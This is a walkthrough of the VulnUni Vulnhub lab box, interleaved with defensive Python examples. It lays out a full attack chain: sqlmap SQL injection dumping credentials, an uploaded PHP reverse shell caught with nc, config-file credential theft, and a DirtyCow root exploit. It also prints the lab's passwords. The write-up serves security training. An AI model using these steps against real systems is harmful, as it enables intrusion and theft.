VulnUni: 1.0.1 | walkthrough | writeup | vulnhub
Hello friends, I'm Shams Ul Mehmood and this is my first article. It is a walkthrough of the VulnUni: 1.0.1 Vulnhub box, a beginner-level boot-to-root challenge. You can find the box here.
Penetration Methodologies
1. Network Scanning
- Identify running services & open ports (Nmap)
2. Enumeration / Reconnaissance
- Web Directories (DIRB / GOBUSTER)
- Vulnerable to RCE (Burp Suite)
3. Exploits
- First Exploit (SQL Injection)
- Second Exploit (Upload backdoor → PHP reverse shell)
- Third Exploit (phpMyAdmin Remote Access)
- Fourth Exploit (Plaintext Password Storage)
4. Privilege Escalation
- Abusing Capability Permission
- Using DirtyCow to exploit kernel version
- Capturing the flag
Walkthrough
Network Scanning
📌️ In the first step I used arp-scan and netdiscover to scan the local network and find the IP address of the target machine.
First command: sudo arp-scan -l
Second command: sudo netdiscover -r 192.168.204.0/24
📌️ After getting the target's IP address I ran an Nmap scan against it. I used:
- -sV : service/version detection
- -sS : TCP SYN scan
- -Pn : skip host discovery (treat the host as up)
- -sC : run the default NSE scripts
Command : sudo nmap -sV -sC -Pn -sS 192.168.204.141
📌️ The Nmap scan shows that TCP port 80 is open, so the target serves a website; browsing to the IP shows a homepage.
Enumeration / Reconnaissance
📌️ In this part I used dirb and gobuster to enumerate hidden files and directories on the target.
Command : dirb http://192.168.204.141
Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.141 -x php,js,py,java,dart,rar,zip,pdf,exe
📌️ Neither tool found anything interesting.
📌️ Browsing the whole site manually and reading the page source, I found a comment in the source of the courses page saying to disable the page "vulnuni-eclass-platform.html" until the new version is installed.
📌️ Let's visit the commented-out page manually.
📌️ It redirects to a login page.
📌️ The page is not found because the redirect goes to "vulnuni.local/vulnuni-eclass/index.php", and the hostname vulnuni.local has no DNS A record that resolves from my machine.
📌️ Let's ping vulnuni.local.
Command : ping vulnuni.local
📌️ Let's add the hostname to our hosts file, pointing vulnuni.local at the target's IP address.
Command : sudo nano /etc/hosts
📌️ Let's ping vulnuni.local again.
📌️ Now the connection to the server at vulnuni.local succeeds.
📌️ Let's follow the redirect to the login page again.
📌️ Here it is. I tried some default credentials like admin:admin and user:password, but they didn't work.
📌️ The page reveals the installed eClass version, so let's Google for vulnerabilities in eClass version 1.7.2.
Exploits
📌️ Found an Unauthenticated Blind SQL Injection vulnerability in a particular parameter.
First Exploit:
📌️ The first exploit needs Burp Suite. Using FoxyProxy and Burp, turn on Intercept, submit the login form at vulnuni.local/vulnuni-eclass with some credentials to capture the login HTTP request, and save the request to a file (Copy to file > save as vulnuni_sql_attack.txt) so it can be loaded into sqlmap.
📌️ Since we don't have an account, we use these parameters and go for time-based blind injection, as the exploit above describes.
📌️ Remember: we want the request, not the response.
📌️ Now for sqlmap. According to the exploit, the saved request is loaded into sqlmap with the following commands.
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt --dbs
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass --tables
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass -T user --columns
Command : sqlmap -r ./Desktop/vulnuni_sql_attack.txt -D eclass -T user -C username,user_id,password,phone,email,department,am,inst_id,nom,prenom,statut --dump
📌️ With the credentials extracted from MySQL I logged in with admin privileges.
admin : ilikecats89
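From the defender's side, the sqlmap run above leaves traces in the web server's access log: sqlmap's default User-Agent, delay functions in query strings, and login requests that take seconds instead of milliseconds. The following Python is an added example, not code from the walkthrough or from eClass; it scores constructed Apache combined-format log lines with the %D response-time field appended, and the sample lines, the parameter name and the 3-second threshold are assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# Apache "combined" format with %D (microseconds spent serving the request) appended.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)" (?P<us>\d+)$'
)
# Delay primitives used by time-based blind techniques on MySQL, PostgreSQL and MSSQL.
DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I)

def classify(line: str, slow_ms: int = 3000) -> Optional[dict]:
    """Return a finding for one log line, or None when nothing looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():               # default UA unless --random-agent is used
        reasons.append("sqlmap-user-agent")
    if DELAY_RE.search(unquote_plus(m["path"])):   # only visible for GET parameters
        reasons.append("delay-payload")
    if int(m["us"]) / 1000 >= slow_ms:            # POST bodies are not logged, so a login
        reasons.append("slow-response")           # that takes seconds is the tell
    return {"ip": m["ip"], "path": m["path"], "reasons": reasons} if reasons else None

def detect(log_text: str, slow_ms: int = 3000) -> List[dict]:
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l, slow_ms) for l in log_text.splitlines()) if f]

# Constructed sample lines: a normal login, a sqlmap POST, a GET carrying a SLEEP()
# payload in an assumed parameter name, and an unrelated fast request.
SAMPLE_LOG = """\
192.168.204.1 - - [10/Mar/2023:10:00:01 +0000] "POST /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 120000
192.168.204.1 - - [10/Mar/2023:10:00:05 +0000] "POST /vulnuni-eclass/index.php HTTP/1.1" 200 5120 "-" "sqlmap/1.6" 5004321
192.168.204.1 - - [10/Mar/2023:10:00:11 +0000] "GET /vulnuni-eclass/index.php?param=a'%20AND%20SLEEP(5)-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5012000
192.168.204.7 - - [10/Mar/2023:10:00:12 +0000] "GET /courses HTTP/1.1" 200 842 "-" "Mozilla/5.0" 9000
"""
```

Run `detect(SAMPLE_LOG)` to see the two flagged requests; the response-time signal is the one that survives when the attacker changes the User-Agent and keeps the payload in the POST body.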
Second Exploit:
📌️ This exploit requires an admin account, which we now have. Log in again with admin : ilikecats89 and follow this exploit to get a reverse shell.
📌️ The difference between the two exploits is that this one ends with a terminal shell on the victim.
📌️ To complete this exploit, get the web shell from here and edit it with your own networking settings (your attacker IP). Set the listening port to 4444.
📌️ Following the exploit, navigate to /modules/course_info/restore_course.php
📌️ Let's compress our shell into a zip file.
Command : zip zipped_vulnuni_php_reverse_shell.zip vulnuni_php_reverse_shell.php
📌️ Then navigate to vulnuni.local/vulnuni-eclass/courses
📌️ Then navigate to vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/Desktop
📌️ Upload the zip file and start a nc listener.
Command : sudo nc -nvlp 4444
📌️ Now we just have to open the location "/courses/tmpUnzipping/php-reverse-shell.php" in the browser and we get a shell.
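The restore step works because the uploaded archive is unpacked as-is under the web root and the server then executes the .php entry it contained. As an added example (not eClass code and not part of the walkthrough), here is a Python check that a restore feature could run on an uploaded archive before unpacking it: it rejects path traversal, symlink entries, web-executable names and oversized content. The archives it builds are constructed for the demonstration, and the size cap is an assumption.

```python
import io
import posixpath
import zipfile
from typing import Dict, List

# Names a web server would execute or honour if they landed under the document root;
# a course backup has no legitimate reason to carry them.
FORBIDDEN = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".htaccess"}
MAX_TOTAL_BYTES = 50 * 1024 * 1024   # cap on uncompressed size (zip-bomb guard)

def validate_archive(data: bytes) -> List[str]:
    """Return the problems found in a zip; an empty list means it is safe to unpack."""
    problems, total = [], 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            norm = posixpath.normpath(name)
            # Zip-slip: absolute paths, backslashes, or entries escaping the target dir.
            if name.startswith("/") or "\\" in name or norm == ".." or norm.startswith("../"):
                problems.append("path traversal: " + name)
            # Upper 16 bits of external_attr carry the Unix mode; 0o120000 is a symlink.
            if (info.external_attr >> 16) & 0o170000 == 0o120000:
                problems.append("symlink entry: " + name)
            base = posixpath.basename(norm).lower()
            if posixpath.splitext(base)[1] in FORBIDDEN or base in FORBIDDEN:
                problems.append("executable content: " + name)
            total += info.file_size
    if total > MAX_TOTAL_BYTES:
        problems.append("uncompressed size %d exceeds limit" % total)
    return problems

def build_zip(entries: Dict[str, str]) -> bytes:
    """Build a small in-memory archive (constructed input for the demonstration)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

# A legitimate backup passes; an archive shaped like the walkthrough's payload is rejected.
GOOD = build_zip({"course.xml": "<course/>", "docs/notes.txt": "notes"})
BAD = build_zip({"php-reverse-shell.php": "placeholder", "../../outside.txt": "x"})
```

Even with this check, the unpack directory should live outside the document root or have PHP execution disabled, so that a bypass of the name filter still yields no code execution.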
📌️ The first thing to do with a bare shell is to upgrade it to a proper terminal. Do that with the pty (pseudo-terminal) module by running python -c 'import pty; pty.spawn("/bin/bash")'.
📌️ Now that I have a terminal shell it's time for privilege escalation. First, though, I grab the user flag, which is in the www-data user's home directory as flag.txt.
📌️ Using uname -srm (-s kernel name, -r kernel release, -m machine hardware name) I see that the kernel version is 3.11.0-15-generic.
📌️ So I will use the DirtyCow exploit in the last part of this walkthrough.
Third Exploit:
📌️ In the third exploit we gain phpMyAdmin access using the MySQL root credentials stored in config.php.
📌️ Reading the file at its absolute path "/var/www/vulnuni-eclass/config/config.php" from the terminal shell gives the root user credentials (root : MYSQLstrongpass1337).
📌️ An alternative way to get the root credentials is to navigate to "vulnuni.local/vulnuni-eclass/modules/admin/confinfo.php" in the browser.
📌️ As you can see, we are now logged in to phpMyAdmin as root.
Fourth Exploit:
📌️ The fourth exploit reads passwords that are stored in plaintext: navigate to "vulnuni.local/vulnuni-eclass/modules/admin/listusers.php" in the browser.
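The third and fourth exploits pay off because the user table and listusers.php hold passwords in the clear, which is why the sqlmap dump above handed over a working admin login. As an added example (not eClass code), this Python shows the storage that would have made the dump useless: per-user salted scrypt hashes with a constant-time verify, plus a small audit that flags rows still stored in plaintext. The record format, the work factors and the sample rows are assumptions.

```python
import base64
import hashlib
import hmac
import os
from typing import Dict, List, Optional

# scrypt work factors; they are stored next to each hash so they can be raised later
# without invalidating existing rows. 128*N*r bytes = 16 MiB of memory per hash.
N, R, P = 2 ** 14, 8, 1

def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'scrypt$N$r$p$salt$hash' with a fresh 16-byte random salt per user."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P, dklen=32)
    return "scrypt$%d$%d$%d$%s$%s" % (N, R, P, _b64(salt), _b64(digest))

def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored parameters and compare in constant time."""
    try:
        algo, n, r, p, salt, digest = stored.split("$")
        if algo != "scrypt":
            return False
        calc = hashlib.scrypt(password.encode(), salt=base64.b64decode(salt),
                              n=int(n), r=int(r), p=int(p), dklen=32)
        return hmac.compare_digest(calc, base64.b64decode(digest))
    except (ValueError, TypeError):   # malformed record, wrong field count, bad base64
        return False

def audit_plaintext(rows: List[Dict[str, str]]) -> List[str]:
    """Usernames whose password column is not a scrypt record, i.e. stored in the clear."""
    return [row["username"] for row in rows if not row["password"].startswith("scrypt$")]

# Constructed rows shaped like the username/password columns of the dumped user table.
SAMPLE_ROWS = [
    {"username": "admin", "password": "ilikecats89"},          # stored in the clear
    {"username": "student", "password": hash_password("pw-placeholder")},
]
```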
Privilege Escalation
📌️ For this box I use DirtyCow. DirtyCow can be unstable, something the exploit documentation itself says; I actually had to compile and run the exploit three times to get a usable root shell.
📌️ Start an Apache web server with sudo service apache2 start and serve the DirtyCow exploit C file from it.
📌️ Download the DirtyCow file (my_dirty.c) onto the victim machine.
📌️ Compile the exploit code with gcc, following the exploit's build guidelines.
Command : gcc -Wall -o dirtycow my_dirty.c -ldl -lpthread
📌️ Before running it, make the dirtycow binary executable, then run the exploit to get a root shell.
Command : chmod +x dirtycow
Command : ./dirtycow
📌️ Finally, I captured the root flag from the root shell 🎯🎯.
Done….🚀🏆🎯💯🤩